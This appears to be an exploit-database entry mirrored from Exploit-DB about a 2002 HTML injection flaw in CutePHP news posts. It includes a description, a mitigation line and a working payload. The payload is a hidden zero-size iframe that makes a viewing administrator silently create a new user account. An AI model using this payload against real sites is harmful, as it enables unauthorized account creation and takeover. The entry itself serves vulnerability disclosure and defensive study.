header-logo
Suggest Exploit
vendor:
CutePHP
by:
SecurityFocus
8.8
CVSS
HIGH
HTML Injection
79
CWE
Product Name: CutePHP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

CutePHP HTML Injection Vulnerability

CutePHP is prone to HTML injection attacks due to insufficient sanitization of user-supplied input. Specifically, user-supplied input to news posts are not sufficiently sanitized of malicious HTML code. An attacker can exploit this vulnerability by crafting a malicious HTML code and submitting it to the vulnerable application.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8060/info

CutePHP is prone to HTML injection attacks. The vulnerability exists due to insufficient sanitization of user-supplied input. Specifically, user-supplied input to news posts are not sufficiently sanitized of malicious HTML code.

<iframe src="index.php?regusername=owned&regpassword= pass&regnickname=owned&regemail=nonenone.com&reglevel= 1&action=adduser&mod=editusers" height=0 width=0 frameborder=0 scrolling=0></iframe>

Navigation

Suggest Exploit

Services By CQR